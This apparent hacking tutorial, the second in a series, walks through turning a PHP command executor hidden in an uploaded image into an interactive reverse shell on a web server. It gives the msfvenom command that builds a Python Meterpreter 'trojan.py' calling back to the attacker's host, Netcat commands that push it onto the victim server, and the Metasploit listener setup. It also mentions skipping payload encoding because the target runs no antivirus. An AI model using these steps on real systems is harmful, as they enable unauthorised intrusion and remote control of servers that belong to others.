How to Upload a Shell to a Web Server and Get Root (RFI): Part 2
If you remember last time, we successfully uploaded picture with a small hidden PHP command executer embedded in it onto a server. Now, our goal is to take this a step further and get an interactive shell. To do this, we need to upload another file that either binds a port for us, or connects back. For this tutorial, we will use a Python reverse Meterpreter shell.
With a newly acquired system, you might be wondering what kind of programs and privileges you have on the system to use for your gain. After searching for some basic tools, I found a hacker's best friend... Netcat.
Perfect! Now we have a simple way to upload and download files!
If the server doesn't have Netcat, I would recommend installing it with a built-in command like wget to download the sources and then you would compile them.
It's also very important to know what system user we are running as. As it turns out, we are running as www-data, so while the admin wasn't stupid enough to run the server as root, we still have full access to the website files (not to be confused with system files)!
As it turns out, yes, we can. We have full networking functions with Netcat and various other common programs. This will make things a lot easier!
Now comes the fun part: getting an interactive shell. I found that Python was installed on the system, so it would be best to use a Python Meterpreter script.
In order to make one, use:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<local IP> LPORT=<port> > trojan.py
It would would be a good idea to encode your payload, but the server I'm hacking doesn't appear to have any AV installed.
Did you know Netcat can transfer files? It's not just for shells. ;)
We'll be using the following Netcat commands to upload our trojan to the server:
Server command: nc -l -p 6666 > trojan.py This will setup a listener waiting for a file called "trojan.py" on port 6666. As you can see, the browser will show the loading animation until Netcat receives the file. This is a general sign that a command is still running, and is good to know.
And to send our trojan, we will use:
nc 10.0.2.53 6666 < trojan.py
That will send the file to the server IP on port 6666. Notices the difference in the symbols... the listener uses a greater than symbol, while the sender uses a less than symbol. Do not mix these up!
If the file was sent successfully, there shouldn't be any output on either sides. We can check if it was successfully sent by running the command ls on the server.
Great, it's there!
Because we are using a Meterpreter payload, we need to setup Metasploit as our listener.
NOTE: There was a Ruby issue with a recent aptitude release of Metasploit, but is now fixed. You can update by apt-get update && apt-get upgrade. That should fix it.
Go ahead and start Metasploit regularly, and setting the module to multi/handler and the payload to python/meterpreter/reverse_tcp. Set the options correctly and type exploit or run to start the listener.
Metasploit continues with its weird obsession of cows...
In order for us to get the shell, all we have to do is run a simple python trojan.py. Once you've done that, check back with Metasploit. You should have a Meterpreter shell.
If we check the system info, we can double check the information we got with uname in the last tutorial. It looks alright! We know it's running Ubuntu on Linux kernel 3.13.0-45-generic. That's important to know...
Indeed there is. We've only just begun our quest to total control. In the next tutorial, we are going to try and further exploit the server for privilege escalation!
C|H of C3